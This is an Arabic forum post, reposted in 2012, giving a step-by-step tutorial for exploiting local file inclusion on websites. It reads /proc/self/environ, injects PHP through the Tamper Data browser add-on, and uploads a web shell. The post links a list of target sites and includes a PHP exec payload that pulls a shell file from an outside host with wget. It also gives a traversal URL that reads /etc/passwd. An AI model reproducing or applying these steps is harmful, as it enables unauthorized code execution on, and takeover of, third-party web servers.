السلام عليكم ورحمة الله وبركاتة
كيفكم اخواني اتمنا الجميع بخير وصحة وعافية
حبيت اطرح هاذا الشرح لجل الافادة واتمنا انه يفديكم
المتطلبات
1. FireFox [
download]
2.
Tamper Data [
download]
والموقع المراد التطبيق علية
انا جبت لكم كم موقع
http://pastie.org/private/7fbtucb1obczki7nk0xvxa
طيب نكمل
في البداية لازم نقدر نقرى proc/self/environ
اضغط هنا لترى الصورة بحجمها الطبيعى
بعد مايضبط الشغل نروح نشغل اداة تمبلر داتا
بعد ماتشتغل معنا الاداة
نروح لم
بعدها نروح لم الموقع حقنا ونعمل تحديث وراح تخرج لن هل النافذة
بعدها نروح للمربع هاذا
في هاذا المربع وضعنا
<?php phpinfo();?>
عشان نقرة phpinfo ونضمن الشغل
بعد ماتضغط اوك راح تخرج لك كم نافضة اضغط على الكل
بعدها ماتضغط وتتخطى
يفتح الموقع ويتم قراة phpinfo
ومنها راح نشوف ادوال والسيف مود وغيرها امر مهم قبل رفع الشل
<?exec('wget
http://www.site.com/shell.txt -O shell.php');?>
هاذي هي الدالة exec الي راح نسخدمها لسحب الملف طبعن تقدر تغيرها اذا كانت ممنوعه
الى chmod
system
ومع شوي تطوير راح تضبط
بعدها
نروح نشوف
راح يفتح الموقع مثل ماكان
طيب لما تنتهي من الحقن مثال هل الموقع
http://www.site.com/index.php?page=/etc/passwd
نمسح
index.php?page=/etc/passwd
ونحط
http://www.site.com/shell.php 
وباذن الله راح يتم الرفع الشل
منقول للفائده،
06-04-2012, 04:41 PM
رفع الشل من خلال ثغرات lif عبر Tamper Data 
العرض الشجري
